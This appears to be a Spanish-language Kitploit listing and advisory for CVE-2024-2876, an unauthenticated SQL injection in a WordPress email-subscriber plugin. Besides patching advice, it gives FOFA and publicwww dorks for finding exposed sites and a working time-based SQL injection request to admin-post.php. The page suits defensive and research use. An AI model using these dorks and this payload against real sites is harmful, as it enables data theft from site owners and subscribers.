Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-2876 | Kitploit
Herramientas/GitHubGitHub/kernel364/cve-2024-2876
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones Web
GitHubkernel364/cve-2024-2876

CVE-2024-2876

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-2876 - Vulnerabilidad de inyección SQL en Email Subscribers by Icegram Express

Descripción general

CVE-2024-2876 es una vulnerabilidad de seguridad crítica encontrada en el plugin "Email Subscribers by Icegram Express" para WordPress. Esta vulnerabilidad afecta a versiones hasta la 5.7.14 inclusive y representa un riesgo significativo para más de 90,000 sitios web.

Detalles de la vulnerabilidad

  • CVE-ID: CVE-2024-2876
  • Puntuación CVSS: 9.8 (Crítica)
  • Versiones afectadas: Hasta 5.7.14
  • Versión parcheada: 5.7.15 y superiores

Descripción

La vulnerabilidad es una falla de inyección SQL que permite a atacantes no autenticados ejecutar consultas SQL maliciosas en las bases de datos de WordPress afectadas. Al manipular entradas de usuario que no se sanean adecuadamente, los atacantes pueden extraer información sensible como nombres de usuario, direcciones de correo electrónico, hashes de contraseñas y listas de suscriptores.

Mecanismo de explotación

La inyección SQL ocurre dentro de la función run de la clase IG_ES_Subscribers_Query del plugin, donde una validación de entrada inadecuada conduce a la ejecución no autorizada de código SQL. Esto compromete la integridad y confidencialidad de los datos almacenados en la base de datos de WordPress.

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Recomendaciones

  1. Actualización inmediata: Si está utilizando el plugin "Email Subscribers by Icegram Express", actualice a la versión 5.7.15 o superior de inmediato para aplicar la corrección de seguridad.

  2. Auditorías periódicas: Revise y actualice regularmente todos los plugins y temas de WordPress a sus últimas versiones para garantizar la seguridad.

  3. Plugins de seguridad: Utilice plugins de seguridad de WordPress de buena reputación para mejorar las defensas contra la inyección SQL y otras amenazas cibernéticas.

  4. Políticas de contraseñas sólidas: Implemente contraseñas fuertes y únicas para todas las cuentas relacionadas con su sitio de WordPress para reducir los riesgos de acceso no autorizado.

Impacto del incumplimiento

No actualizar el plugin afectado puede dejar los sitios web vulnerables a violaciones de datos y accesos no autorizados. Dado el uso generalizado de este plugin, la acción inmediata es crucial para asegurar las instalaciones.

Descargar herramienta